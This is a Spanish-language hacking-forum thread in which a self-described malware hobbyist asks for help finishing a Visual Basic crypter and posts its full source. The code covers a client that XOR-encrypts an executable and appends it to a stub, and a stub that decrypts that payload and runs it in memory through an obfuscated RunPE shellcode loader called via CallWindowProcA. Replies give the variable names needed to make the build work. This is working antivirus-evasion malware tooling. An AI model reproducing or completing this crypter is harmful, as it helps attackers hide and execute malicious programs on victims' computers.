Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - skL

Páginas1
#1
Dudas y pedidos generales / Re:Ayuda VB MyCrypter! [Solo para Humildes]
Noviembre 24, 2017, 02:00:28 AM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Y digo yo... que gracia tiene que copies y pegues código que han hecho otros sin saber si quiera reasignar el valor a las variables?
No es una buena idea empezar la casa por el tejado.

Saludos

Actualmente estoy viendo un Curso por Youtubee! no de modding! si no De VB! y tienes mucha razon! tal vez sea asi como dices! Pero una vez sepa que variables reemplazar podria facilmente empezar a crear mis Cryp!! .. mientras voy entiendo todo lo que es programacion Y con mis mismos cryp Practicar a modificar lo que no me parezcaa!  de todas manera respeto tu opinion! pero es un foro dedicado al malware donde se supone hayan usuarios avanzados [ NO BAJO OBLIGACIÓN] Porque nada es obligado! que deberian tenderle la mano al menos experto! hay un viejo dicho mi hermano que dice : A QUIEN TIENE HAMBRE DALE UN PAN!! de igual manera Gracias! <3 seguire intentando!  saludos 
#2
Dudas y pedidos generales / Re:Ayuda VB MyCrypter! [Solo para Humildes]
Noviembre 23, 2017, 05:31:27 PM
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
CitarEstoy en la creación de mi Cryp!

Yo quiero aprender para compartir! igual estoy aprendiendo por ustedes! llegara un momento donde tanto esfuerzo mereza un recompenza pero a quienes me ayudaron Jamas le daria la espalda! aqui el resultado de mi Stub sin ninguna modificacion fuera del VB!!
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Pero ahora tengo un problema! creo que codifique mal los modulos del Stb! porque cuando encrypto la bolita, el encryptado es como si fuera el stb, da el mismo error 9, fuera del intervalo y no queda funcional! algo hice mal! ayudame porfavor :C



You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Donde dice RC4 debes de poner lo siguiente  HcWKeeZlLT
Donde dice RUMPE debes de poner lo siguiente  PbjjZyYKZdJnuOafFnDMeTOiZZhgZxKYpsHodgumWIJSPZfMcUMTJejSdoLi
Y donde dice SenhaA puedes poner AAAA y en SenhaB puedes poner BBBBB, pero lo importante es que  sean identicas tanto como en el cliente y stub, por lo que vi en el cliente viene senhaA y B con letra inicial minuscula y por ese motivo tambien te puede salir error al momento de ejecutar el archivo encryptado. Saludos


Hermano ayudame porfavor! si puedes! tienes skype? ahora el error es otro y llevo mi source bastante limpio! You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Tengo este PROBLEMA ahora!
Ese error lo da el encryptadoo! pareciera que encryptara el stub sobre el stub :S

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Ayuda porfavor!
#3
Dudas y pedidos generales / Ayuda VB MyCrypter! [Solo para Humildes]
Noviembre 22, 2017, 09:39:18 PM
Bueno , Como dice el Titulo! si NO eres humilde No tienes porque Ayudar a este Newbie Común!

Estoy en la creación de mi Cryp! después de 2 Años en el tema Malware Y aunque Para la fecha 2017 Un Crypter sea cualquier cosa! debido al Progreso Y las actualizaciones de los Av's!
Quisiera de una vez por toda Sacarme la espina que tengo Y modear uno desde el Source Ya que siempre lo hice desde el Binario! ..

Ademas de que mi Fuerte nunca fue este tema :

Bueno Pasa que Genero desde una Tools todo lo que tiene que ver con el Source para el Cryp! tal Como el Boton Buscar, Encryptar, RC4 , sMain Y rUMPE! Y si o si! por logica en la programacion! Dicho cliente.exe [Crypter] debe tener un lazo inquebrantable con el [Stub] esto puede ser en la encryptacion RC4 o me equivoco?? es decir : Si estoy generando todo al azar desde la tool , Para que todo funcione de maravilla debe existir una llamada al Runpe Y RC4 tanto en el cliente como en el STUB ciertoo? he alli mi problemaa! que no se absolutamente nada en programacion Y estoy dedicado a ello! Pero aun no consigo la llamada O la pass que deberia ir en dichos Proyectos para que 1 funcione tomando parte del oTro!

He gerado un nuevo source para plantear mi duda! digamos que extactamente mis codigos quedan asii!

CLIENTE

BOTON BUSCAR
Código: text
Private Sub Command1_Click()
With CommonDialog1
.DialogTitle = "Selecione o Arquivo a ser encryptado"
.Filter = "Aplicações EXE|*.exe"
.ShowOpen
End With

If Not CommonDialog1.FileName = vbNullString Then
Text1.Text = CommonDialog1.FileName
MsgBox "Arquivo Carregado", vbInformation, Me.Caption
End If
End Sub


BOTON ENCRYPTAR
Código: text
Private Sub Command2_Click()
Dim Stub As String, Archivo As String
If Text1.Text = vbNullString Then
MsgBox "Deve escolher um arquivo antes", vbExclamation, Me.Caption
Exit Sub
Else

Open App.Path & "\Stub.exe" For Binary As #1
Stub = Space(LOF(1))
Get #1, , Stub
Close #1

Open Text1.Text For Binary As #1
Archivo = Space(LOF(1))
Get #1, , Archivo
Close #1

With CommonDialog1
.DialogTitle = "Selecione onde deseja salvar o arquivo"
.Filter = "Aplicações EXE|*.exe"
.ShowSave
End With
If Not CommonDialog1.FileName = vbNullString Then

Archivo = RC4(Archivo, "senhaA")

Open CommonDialog1.FileName For Binary As #1
Put #1, , Stub & "senhaB" & Archivo & "##$$##"
Close #1

MsgBox "~[X] Seu Server Foi Encryptado Com Sucesso [X]~", vbInformation, Me.Caption
End If

End If
End Sub


ENCYPTACION RC4
Código: text
Function HcWKeeZlLT(ujzKhsboeN As String, YsxiZOZtdH As String) As String
On Error Resume Next
Dim aMTLVMdTwA() As Byte
Dim TiINGScwvs() As Byte
Dim XvOEQPLIjl As Long
Dim RInTQVoWDf As Long
Dim WNdXpQBUMa As Long
Dim RTmzEUIVAU As Long
TiINGScwvs () = StrConv(ujzKhsboeN, vbFromUnicode)
aMTLVMdTwA () = StrConv(YsxiZOZtdH, vbFromUnicode)
WNdXpQBUMa = UBound( TiINGScwvs )
RTmzEUIVAU = UBound( aMTLVMdTwA )
Do Until XvOEQPLIjl > WNdXpQBUMa
TiINGScwvs(XvOEQPLIjl) = TiINGScwvs(XvOEQPLIjl) Xor aMTLVMdTwA(RInTQVoWDf)
RInTQVoWDf = RInTQVoWDf + 1
If RInTQVoWDf > RTmzEUIVAU Then RInTQVoWDf = 0
XvOEQPLIjl = XvOEQPLIjl + 1
Loop
Erase aMTLVMdTwA
HcWKeeZlLT = StrConv(TiINGScwvs, vbUnicode)
Erase TiINGScwvs
End Function


Ok , hasta este punto el cliente deberia de funcionar de maravilla!

Pero ahora pasemos al Stub!

STUB

Smain
Código: text
Declare Function GetModuleFileNameA Lib "kernel32 " (ByVal npHruAlgMF As Integer, ByVal hDhGuGPvgz As String, ByVal AcfbxnzeUq As Integer) As Integer 
Sub Main()
Dim vioDMsGfIl As Long 
vioDMsGfIl = FreeFile 
Dim PAWleYVARd As String 
PAWleYVARd = MyPbHbGmbZ
Dim vdpnSsWgjQ As String 
Open MyPbHbGmbZ For Binary As vioDMsGfIl
vdpnSsWgjQ = String(FileLen( MyPbHbGmbZ ), " ")
Get vioDMsGfIl , , vdpnSsWgjQ
Close vioDMsGfIl
Dim HoaGofKpsK () As String 
HoaGofKpsK() = Split( vdpnSsWgjQ, "SenhaB")
HoaGofKpsK ( vioDMsGfIl ) = RC4( HoaGofKpsK ( vioDMsGfIl ), "SenhaA")
Call RumPe(MyPbHbGmbZ , StrConv( HoaGofKpsK ( vioDMsGfIl ), vbFromUnicode))
 End Sub 
Public Function MyPbHbGmbZ () As String 
Dim eqbPjJgjrF As Long 
Dim FOFMyiVQAx () As String 
ReDim FOFMyiVQAx(dIqiIKWvUt ) 
For eqbPjJgjrF = dIqiIKWvUt To Len(XHC6) 
FOFMyiVQAx ( dIqiIKWvUt ) = String(256, " ")
MyPbHbGmbZ = GetModuleFileNameA( eqbPjJgjrF , FOFMyiVQAx ( dIqiIKWvUt ), 256)
MyPbHbGmbZ = FOFMyiVQAx ( eqbPjJgjrF )
Next eqbPjJgjrF
End Function


ENCYPTACION RC4 Me supongo que debe ser el mismo que utilizo en el Cliente!
Código: text
Function HcWKeeZlLT(ujzKhsboeN As String, YsxiZOZtdH As String) As String
On Error Resume Next
Dim aMTLVMdTwA() As Byte
Dim TiINGScwvs() As Byte
Dim XvOEQPLIjl As Long
Dim RInTQVoWDf As Long
Dim WNdXpQBUMa As Long
Dim RTmzEUIVAU As Long
TiINGScwvs () = StrConv(ujzKhsboeN, vbFromUnicode)
aMTLVMdTwA () = StrConv(YsxiZOZtdH, vbFromUnicode)
WNdXpQBUMa = UBound( TiINGScwvs )
RTmzEUIVAU = UBound( aMTLVMdTwA )
Do Until XvOEQPLIjl > WNdXpQBUMa
TiINGScwvs(XvOEQPLIjl) = TiINGScwvs(XvOEQPLIjl) Xor aMTLVMdTwA(RInTQVoWDf)
RInTQVoWDf = RInTQVoWDf + 1
If RInTQVoWDf > RTmzEUIVAU Then RInTQVoWDf = 0
XvOEQPLIjl = XvOEQPLIjl + 1
Loop
Erase aMTLVMdTwA
HcWKeeZlLT = StrConv(TiINGScwvs, vbUnicode)
Erase TiINGScwvs
End Function


RUMPE
Código: text
Public Declare Function CallWindowProcA Lib "\windows\system32\user32.dll" (ByVal GcDHOHTMEdqBkIuMseSBJjDDpvQsInGaFcIaJXXvLkppKLDmQOAuNcGysTxo As Long, ByVal kqzvAdAQcsljNhrHiJGlwrIAJzKZEXZrkufccdMvuWGDUSKUuiJLaqDjvcRq As Long, ByVal O670y0Y8GcDHOHTMEdqBkIuMseSBJjDDpvQsInGaFcIaJXXvLkppKLDmQOAuNcGysTxoCdNSjLqNUDgHFGEClZaWyrYoXGhYAifBOUITZSmafYFahfPZKluHPbSOaJrq As Long, ByVal WAtRvroiCQxePslTouRhtHIeAIIklEajDehZFNYrrAloGwmgKMVAGfSTfdVe As Long, ByVal HKonpGdAboJYRDffvecerXJJrSFwSkabVPjVjxknoeQasZOsariolThEPfYT As Long) As Long
Private LbtvuCvLpDzuPLkVyiKhTbjSHkyMRsizxkIhtbJRqwZDnsrzWrGgLdviLeEl(1287)           As Byte
Private fyZtGiugXQRQZxRnBDCsPrTJkmZZBNdgmuhnaWvhCYFSMJOGWThZBgwmQyiZ(7)              As String
Public Sub PbjjZyYKZdJnuOafFnDMeTOiZZhgZxKYpsHodgumWIJSPZfMcUMTJejSdoLi(ByVal LbtvuCvLpDzuPLkVyiKhTbjSHkyMRsizxkIhtbJRqwZDnsrzWrGgLdviLeElQIUPAxixwpdLbJLzInNpMHTobwWkjudYFfjkDGHdyBkEymqSmxuOhVLXAAmN As String, TaYXFtAJKDThZRQpLrvsoLtxrOQAhCmwhAHvNkfHBUthsFSZhySGHeYBwyRg() As Byte)
Dim nxFVRZzdrRkDjDxGPMnDkbdoUQrNSXgeWKhCufRYMvZwRXpgiZuzxiZGATvU As Long, YZOLlpdIudcaETGySwnXzDYMJDzUpGNVZIHCxpRcggdwVmGmnbYtFfNlOJYd As Long, ZHAsMonvRpwylOrSVwyAhreSLaoYzDhWpvjyYPdTJZFiDARsyDGodWoqkUzI As Long
fyZtGiugXQRQZxRnBDCsPrTJkmZZBNdgmuhnaWvhCYFSMJOGWThZBgwmQyiZ(0) = WAtRvroiCQxePslTouRhtHIeAIIklEajDehZFNYrrAloGwmgKMVAGfSTfdVe(cZEzQkFGeDmUjWwIYAgDJvDbbsipxLpuRQHKitCxMsNLxTuztEegCgBVgTfa("X-\PY.;]L8K3X-ZPY.NeL8OfX-\BY.NeL8IcX-ZPY.IgL8OfX-\EY.NeL8IcX-ZPY.H6L8OfX-YSY.NeL8LdX-ZPY.NeL8OfX-\EY.NeL8HbX-ZPY.HaL8OfX-\CY.NeL8I5X-ZPY.NeL8OfX-ZPY.NeL8OfX-ZPY.NeL8OfX-ZPY.NeL8OfX-ZPY.NeL8OfX-ZPY.NeL8OfX-ZPY.NeL8OfX-ZPY.NeL8OfX-ZPY.NeL8OfX-ZPY.NeL8OfX-ZPY.NeL8OfX-ZPY.NeL8OfX-ZPY.NeL8OfX-ZPY.NeL8OfX-ZPY.NeL8OfX-ZPY.NeL8OfX-ZPY.NeL8OfX-_BY.V7L895X-\AY.JgL8:^X-(BY.NfL8OfX-ZPY.V7L8JbX-XTY.L]L8W_X-[QY.V7L8JbX-XTY.L6L8I7X-YEY.;]L8>7X-ZSY.NeL8OfX-bIY.OdL8I7X-^AY.;]L8>gX-ZSY.NeL8OfX-bIY.M\L8I7X-[EY.H4L8L5X-/HY.W1L8OeX-ZPY.NeL8I7X-XRY.H]L89bX-ZPY.NeL8OfX-/HY.WdL8OeX-ZPY.NeL8I7X-XVY.H4L8MbX-/HY.V]L8OeX-ZPY.NeL8I7X-XAY.H4L8KfX-/HY.I3L8OeX-ZPY.Ne", "8"))
fyZtGiugXQRQZxRnBDCsPrTJkmZZBNdgmuhnaWvhCYFSMJOGWThZBgwmQyiZ(1) = WAtRvroiCQxePslTouRhtHIeAIIklEajDehZFNYrrAloGwmgKMVAGfSTfdVe(cZEzQkFGeDmUjWwIYAgDJvDbbsipxLpuRQHKitCxMsNLxTuztEegCgBVgTfa("X-\AY.L0L8I7X-ZCY.;]L8H`X-ZSY.NeL8OfX-\AY.MgL8I^X-)HY.NeL8OfX-ZPY.;]L8I7X-ZSY.NeL8OfX-\AY.L4L8:^X-_CY.NfL8OfX-ZPY.V7L8O_X-)WY.NdL8KbX-ZPY.NeL8OfX-\AY.OgL8:^X-^DY.NfL8OfX-ZPY.H]L8J4X-/HY.OaL8<0X-_QY.;]L8H_X-ZSY.NeL8OfX-\AY.M0L8:^X-YBY.NfL8OfX-ZPY.V7L8;gX-\AY.O0L8:^X-YRY.NfL8OfX-ZPY.H4L8KfX-,FY.MgL890X-YQY.83L8;fX-\AY.OgL8:^X-XSY.NfL8OfX-ZPY.H]L8J4X-/HY.OaL8<0X-_QY.;]L8K0X-ZSY.NeL8OfX-\AY.O0L8:^X-[QY.NfL8OfX-ZPY.V7L8O_X-bBY.KdL8L5X-\AY.M0L8:^X-ZUY.NfL8OfX-ZPY.V7L8L_X-ZSY.84L8I7X-XRY.;]L897X-ZRY.NeL8OfX-bBY.N\L8I^X-,HY.NeL8OfX-ZPY.KbL8JgX-,FY.:eL8I7X-ZPY.;]L8:^X-ZRY.NeL8OfX-\HY.V]L893X-(SY.OcL8JgX-/HY.OaL8OeX-ZPY.NeL8I7X-XEY.;]L8;`X-ZRY.Ne", "8"))
fyZtGiugXQRQZxRnBDCsPrTJkmZZBNdgmuhnaWvhCYFSMJOGWThZBgwmQyiZ(2) = WAtRvroiCQxePslTouRhtHIeAIIklEajDehZFNYrrAloGwmgKMVAGfSTfdVe(cZEzQkFGeDmUjWwIYAgDJvDbbsipxLpuRQHKitCxMsNLxTuztEegCgBVgTfa("S(UKT)Q2G3GZS(W<T)G/G35YS($?T)IbG3JaS(UKT)Q2G3IbS(W<T)EbG35YS($OT)IbG3JaS(UKT)F]G3E_S(W<T)I`G3D2S(UKT)C/G3J]S(W<T)I`G3D2S(UKT)C/G3JaS(W<T)I`G34+S(TLT)3.G36aS(W<T)JbG35YS(&DT)IbG3JaS(UKT)CXG36aS(TRT)J`G34_S(ZLT)6XG36^S(UMT)I`G3JaS(W<T)GbG35YS(^RT)IbG3JaS(UKT)Q2G3IbS(W<T)G+G35YS(]@T)IbG3JaS(UKT)Q2G3JZS('AT)DbG3G]S('AT)H_G34+S()KT)C/G3JaS(*CT)D+G3J_S(UKT)I`G3DYS(^>T)R[G3I2S(W@T)F_G35YS(&<T)IbG3JaS(UKT)C/G3H_S(*CT)C1G3J_S(UKT)I`G3R/S(VLT)Q2G3GZS(W<T)G+G35YS(WLT)IbG3JaS(UKT)Q2G3JZS(W<T)E`G3DYS(UKT)H`G3JaS(UKT)3.G3C_S(ZKT)3.G3C\S(TOT)3.G3GbS('AT)5`G3D2S(TQT)6XG3F\S(UMT)I`G3JaS(]=T)5_G3D2S(SMT)6XG3G.S(UMT)I`G3JaS(]=T)HWG3D2S(T@T)6XG3G^S(UMT)I`", "3"))
fyZtGiugXQRQZxRnBDCsPrTJkmZZBNdgmuhnaWvhCYFSMJOGWThZBgwmQyiZ(3) = WAtRvroiCQxePslTouRhtHIeAIIklEajDehZFNYrrAloGwmgKMVAGfSTfdVe(cZEzQkFGeDmUjWwIYAgDJvDbbsipxLpuRQHKitCxMsNLxTuztEegCgBVgTfa("V+XNW,T5J6JeV+Z?W,JeJ68\V+VAW,LeJ6MdV+XNW,T5J6MeV+Z?W,J.J68\V+VQW,LeJ6MdV+XNW,T5J6M]V+]PW,61J6F_V+]RW,IaJ67.V+[NW,K_J67.V+WOW,F2J6MdV+-FW,McJ6MbV+XNW,LcJ6G\V+)OW,F2J6J0V+,FW,IbJ68\V+WAW,LeJ6MdV+XNW,TdJ6:`V+XAW,61J69dV+Z?W,MeJ68\V+*GW,LbJ6MdV+XNW,F[J6H2V+-FW,M_J6:.V+]OW,9[J6KaV+XPW,LcJ6MdV+Z?W,JeJ68\V+-UW,LbJ6MdV+XNW,T5J6LeV+`QW,;eJ6M^V+Z?W,K2J68\V+,@W,LbJ6MdV+XNW,F2J6MbV+]PW,IbJ67.V+,NW,F2J6J^V+-FW,;.J6MeV+XNW,LcJ6:_V+XOW,LcJ6MdV+XNW,LcJ6;\V+VFW,LcJ6MdV+XNW,F2J6J^V+-FW,:4J6MeV+XNW,LcJ67_V+VOW,F2J6L1V+-FW,:dJ6MeV+XNW,LcJ6U2V+YOW,T5J6HbV+WAW,TbJ6:bV+*FW,LcJ6MdV+XNW,LdJ69dV+Z?W,K.J68\V+aDW,LbJ6MdV+XNW,LdJ6LeV+Z?W,JaJ68\V+aTW,LbJ6MdV+XNW,F2", "6"))
fyZtGiugXQRQZxRnBDCsPrTJkmZZBNdgmuhnaWvhCYFSMJOGWThZBgwmQyiZ(4) = WAtRvroiCQxePslTouRhtHIeAIIklEajDehZFNYrrAloGwmgKMVAGfSTfdVe(cZEzQkFGeDmUjWwIYAgDJvDbbsipxLpuRQHKitCxMsNLxTuztEegCgBVgTfa("V+VFW,IeJ67.V+WOW,F2J6LbV+-FW,T2J6MeV+XNW,LcJ6G\V+]@W,9[J6L`V+'DW,IbJ68\V+&TW,LbJ6MdV+XNW,TdJ6:`V+XAW,61J69dV+Z?W,JaJ68\V+[QW,LbJ6MdV+XNW,T5J6J]V+`@W,LZJ6U2V+[OW,M_J6G5V+WCW,9[J6GaV+XOW,LcJ6MdV+XQW,KbJ6G5V+VTW,9[J6H3V+XOW,LcJ6MdV+`@W,LZJ6U2V+]OW,L4J6G5V+VPW,9[J6HdV+XOW,LcJ6MdV+`@W,LZJ6McV+]OW,K_J6G5V+\TW,9[J6I`V+XOW,LcJ6MdV+`@W,;bJ6G5V+VCW,9[J6J2V+XOW,LcJ6MdV+`@W,LZJ6HdV+*DW,G`J6LdV+]TW,IeJ67.V+WOW,F2J6MdV+-FW,J2J6MeV+XNW,LcJ6G\V+)OW,F2J6J0V+,FW,IbJ68\V+]TW,LbJ6MdV+XNW,TdJ6:`V+XAW,61J69dV+Z?W,KaJ68\V+YQW,LbJ6MdV+XNW,T5J6LeV+`QW,;eJ6MeV+`GW,MbJ6G5V+W?W,9[J6MaV+XOW,LcJ6MdV+`@W,LZJ6J2V+'?W,L1J6UaV+WQW,61J67.V+*DW,F2J6JbV+-FW,6_J6MdV+XNW,Lc", "6"))
fyZtGiugXQRQZxRnBDCsPrTJkmZZBNdgmuhnaWvhCYFSMJOGWThZBgwmQyiZ(5) = WAtRvroiCQxePslTouRhtHIeAIIklEajDehZFNYrrAloGwmgKMVAGfSTfdVe(cZEzQkFGeDmUjWwIYAgDJvDbbsipxLpuRQHKitCxMsNLxTuztEegCgBVgTfa("U*_?V+KYI59^U*WNV+K_I5LcU*WNV+KbI5F4U*WMV+8ZI57`U*WMV+KbI5LcU*YEV+7dI59^U*(TV+EZI5GdU*,EV+LaI5LdU*WMV+KbI5F4U*VOV+8ZI58bU*WMV+KbI5LcU*_?V+LaI5F4U*UBV+8ZI594U*WMV+KbI5LcU*_?V+KYI5GaU*)CV+FaI5L_U*)CV+7bI5F4U*UOV+8ZI5:1U*WMV+KbI5LcU*_?V+JYI5TbU*&TV+J^I5F4U*VOV+8ZI5;-U*WMV+KbI5LcU*_?V+JaI5T1U*%SV+<^I5LcU*WMV+KbI5TbU*&SV+KZI5F4U*UBV+8ZI5S/U*WMV+KbI5LcU*_?V+LaI5F4U*[SV+8ZI5S_U*WMV+KbI5LcU*\NV+E1I5L_U*\TV+H`I56-U*VOV+E1I5LcU*,EV+S`I5LcU*WMV+KbI5F[U*(NV+E1I5I/U*+EV+HaI57[U*%OV+KbI5LcU*WMV+ScI59_U*W@V+50I58cU*Y>V+IdI57[U*YCV+KbI5LcU*WMV+S4I5L\U*_?V+HaI5J[U*WPV+HaI5I_U*Y>V+JdI57[U*YMV+KbI5LcU*WMV+S4I5L\U*_NV+:aI5:cU*WMV+KbI5LcU*_FV+LaI5F4U*WMV+8Z", "5"))
fyZtGiugXQRQZxRnBDCsPrTJkmZZBNdgmuhnaWvhCYFSMJOGWThZBgwmQyiZ(6) = WAtRvroiCQxePslTouRhtHIeAIIklEajDehZFNYrrAloGwmgKMVAGfSTfdVe(cZEzQkFGeDmUjWwIYAgDJvDbbsipxLpuRQHKitCxMsNLxTuztEegCgBVgTfa("V+\DW,LcJ6MdV+XNW,F[J69cV+'UW,=`J68\V+]OW,9[J6F2V+XNW,LcJ6MdV+Z?W,KeJ68\V+WBW,LcJ6MdV+XNW,T5J69eV+Z?W,J.J68\V+WRW,LcJ6MdV+XNW,T5J6M]V+*DW,KeJ67.V+[OW,L_J67.V+,NW,F2J6MdV+-FW,J_J6MdV+XNW,LcJ6G\V+`FW,K1J6I5V+aCW,IbJ68\V+]NW,LcJ6MdV+XNW,F2J6K1V+-FW,MeJ6MdV+XNW,LcJ6U2V+XGW,61J6FeV+XRW,61J69dV+Z?W,H2J68\V+XRW,LcJ6MdV+XNW,T5J6KeV+ZOW,;dJ6U2V+'@W,LdJ6I3V+VRW,L_J6:cV+Z?W,LcJ68\V+*PW,61J67.V+*DW,F[J6H`V+'?W,=1J6TeV+]OW,9[J6L1V+XNW,LcJ6MdV+Z?W,HcJ6G\V+XNW,McJ6MdV+XNW,61J6F`V+VRW,M[J6G5V+XNW,61J69dV+*DW,G_J6K`V+YRW,9[J6:.V+*DW,61J67.V+`GW,LbJ6UcV+'RW,McJ6:cV+-FW,JeJ6MdV+XNW,LcJ6G\V+)RW,H.J6M1V+-AW,IcJ68\V+\@W,LcJ6MdV+XNW,TdJ6:`V+XFW,61J6F`V+VRW,L_", "6"))
fyZtGiugXQRQZxRnBDCsPrTJkmZZBNdgmuhnaWvhCYFSMJOGWThZBgwmQyiZ(7) = WAtRvroiCQxePslTouRhtHIeAIIklEajDehZFNYrrAloGwmgKMVAGfSTfdVe(cZEzQkFGeDmUjWwIYAgDJvDbbsipxLpuRQHKitCxMsNLxTuztEegCgBVgTfa("S('AT)5`G34+S(XOT)G\G3JYS(ZKT)6XG3GYS(UKT)I`G3JaS(]NT)8\G3JYS($NT)F[G3E_S(ZLT)FaG3E[S(ZRT)HaG37aS(WOT)Q2G3CaS(TKT)Q2G3C[S(U>T)Q2G3C[S(V>T)Q2G3D.S(UCT)Q2G3C.S(SKT)Q2G3G[S(TCT)E]G3IYS(XPT)3aG3RaS(TAT)C2G3C]S(URT)Q`G3G+S(Y=T)D\G3J_S(*=T)6]G3R/S($PT)F.G3E.S(Z=T)FWG3E2S(Z?T)8aG3E^S(ZMT)F_G3E`S(ZQT)F]G3R/S(W>T)G\G3I0S(]PT)6,G3C]S(YNT)Q2G3F^S(T>T)Q2G3E]S(SCT)DXG3J`S()PT)Q2G3F2S(VCT)Q2G3E2S(SKT)IaG36-S(*NT)H`G3FZS(]=T)H\G3R/S(UNT)3[G3G`S('AT)HaG37aS('>T):1G3R]S($KT)D\G3J\S($LT)8.G3J-S(UNT)3XG35/S('OT)H2G3C0S(SOT)G`G3C^S(*LT)Q2G3E2S(SOT)IaG36-S(WQT)Q2G3J0S(Y=T)Q2G3E2S(V>T)IaG36-S(]=T)I\G3R/S(UNT)8[G3E+S(Z@T)F2G3EZS(Z<T)F,G37`S($NT)I`G3JaS(UKT)I`", "3"))
For nxFVRZzdrRkDjDxGPMnDkbdoUQrNSXgeWKhCufRYMvZwRXpgiZuzxiZGATvU = False To 7:  For YZOLlpdIudcaETGySwnXzDYMJDzUpGNVZIHCxpRcggdwVmGmnbYtFfNlOJYd = 1 To 644 Step 4: LbtvuCvLpDzuPLkVyiKhTbjSHkyMRsizxkIhtbJRqwZDnsrzWrGgLdviLeEl(ZHAsMonvRpwylOrSVwyAhreSLaoYzDhWpvjyYPdTJZFiDARsyDGodWoqkUzI) = Mid(fyZtGiugXQRQZxRnBDCsPrTJkmZZBNdgmuhnaWvhCYFSMJOGWThZBgwmQyiZ(nxFVRZzdrRkDjDxGPMnDkbdoUQrNSXgeWKhCufRYMvZwRXpgiZuzxiZGATvU), YZOLlpdIudcaETGySwnXzDYMJDzUpGNVZIHCxpRcggdwVmGmnbYtFfNlOJYd, 4): ZHAsMonvRpwylOrSVwyAhreSLaoYzDhWpvjyYPdTJZFiDARsyDGodWoqkUzI = ZHAsMonvRpwylOrSVwyAhreSLaoYzDhWpvjyYPdTJZFiDARsyDGodWoqkUzI + 1: Next YZOLlpdIudcaETGySwnXzDYMJDzUpGNVZIHCxpRcggdwVmGmnbYtFfNlOJYd: Next nxFVRZzdrRkDjDxGPMnDkbdoUQrNSXgeWKhCufRYMvZwRXpgiZuzxiZGATvU
Dim wwlycQEbMRDqtIdZcVXOFLnSDuJBihkbGagQOooOXTtZWkRGufGZtjCZlnJO As Variant
hYunwgiFPdvNOZmRfFYiUnirthRJFQRTIYHRSynSrExaaAiMzhkTAgqEzdlY = VarPtr(LbtvuCvLpDzuPLkVyiKhTbjSHkyMRsizxkIhtbJRqwZDnsrzWrGgLdviLeEl(0))
Dim iGgUXfstmpPlvUXliFiLCboxvEGMPNkUYLiMsYAKUxZLINtSJKSOZYRKVpNC As Variant
iGgUXfstmpPlvUXliFiLCboxvEGMPNkUYLiMsYAKUxZLINtSJKSOZYRKVpNC = StrPtr(LbtvuCvLpDzuPLkVyiKhTbjSHkyMRsizxkIhtbJRqwZDnsrzWrGgLdviLeElQIUPAxixwpdLbJLzInNpMHTobwWkjudYFfjkDGHdyBkEymqSmxuOhVLXAAmN)
Dim lXkbbcKEzDFHuccblJQNefOGLWAdOVtsAgHYCCZnXPhoDgVZFKqGyheoRnsV As Variant
lXkbbcKEzDFHuccblJQNefOGLWAdOVtsAgHYCCZnXPhoDgVZFKqGyheoRnsV = VarPtr(TaYXFtAJKDThZRQpLrvsoLtxrOQAhCmwhAHvNkfHBUthsFSZhySGHeYBwyRg(0))
CallWindowProcA hYunwgiFPdvNOZmRfFYiUnirthRJFQRTIYHRSynSrExaaAiMzhkTAgqEzdlY, iGgUXfstmpPlvUXliFiLCboxvEGMPNkUYLiMsYAKUxZLINtSJKSOZYRKVpNC, lXkbbcKEzDFHuccblJQNefOGLWAdOVtsAgHYCCZnXPhoDgVZFKqGyheoRnsV, 0, 0
End Sub
Function WAtRvroiCQxePslTouRhtHIeAIIklEajDehZFNYrrAloGwmgKMVAGfSTfdVe(ByVal FvRanIJZhRWdDOJspeIZavyxnYapzqnZpqgejxLEirODcxsgFmSzplftWIWJ As String)
Dim qXaPHXnDkeOAZeSlsOJtpXtVcLixWZUQsoHfmHKICbRDfNJmLnxtwiTYkyzS As Long, rEMwiWxqHpiYFZDEvOTWYLybeiYAgXnRIaibMhXAfVtpObUsVQfnUZudGJax As Long
For qXaPHXnDkeOAZeSlsOJtpXtVcLixWZUQsoHfmHKICbRDfNJmLnxtwiTYkyzS = 1 To Len(FvRanIJZhRWdDOJspeIZavyxnYapzqnZpqgejxLEirODcxsgFmSzplftWIWJ)
Mid(FvRanIJZhRWdDOJspeIZavyxnYapzqnZpqgejxLEirODcxsgFmSzplftWIWJ, qXaPHXnDkeOAZeSlsOJtpXtVcLixWZUQsoHfmHKICbRDfNJmLnxtwiTYkyzS, 1) = Chr((Asc(Mid(FvRanIJZhRWdDOJspeIZavyxnYapzqnZpqgejxLEirODcxsgFmSzplftWIWJ, qXaPHXnDkeOAZeSlsOJtpXtVcLixWZUQsoHfmHKICbRDfNJmLnxtwiTYkyzS, 1))) Xor (Asc(Mid(cZEzQkFGeDmUjWwIYAgDJvDbbsipxLpuRQHKitCxMsNLxTuztEegCgBVgTfa("vk€w", "9"), rEMwiWxqHpiYFZDEvOTWYLybeiYAgXnRIaibMhXAfVtpObUsVQfnUZudGJax + 1, 1))))
rEMwiWxqHpiYFZDEvOTWYLybeiYAgXnRIaibMhXAfVtpObUsVQfnUZudGJax = ((rEMwiWxqHpiYFZDEvOTWYLybeiYAgXnRIaibMhXAfVtpObUsVQfnUZudGJax + 1) Mod Len(cZEzQkFGeDmUjWwIYAgDJvDbbsipxLpuRQHKitCxMsNLxTuztEegCgBVgTfa("vk€w", "9")))
Next qXaPHXnDkeOAZeSlsOJtpXtVcLixWZUQsoHfmHKICbRDfNJmLnxtwiTYkyzS
WAtRvroiCQxePslTouRhtHIeAIIklEajDehZFNYrrAloGwmgKMVAGfSTfdVe = FvRanIJZhRWdDOJspeIZavyxnYapzqnZpqgejxLEirODcxsgFmSzplftWIWJ
End Function
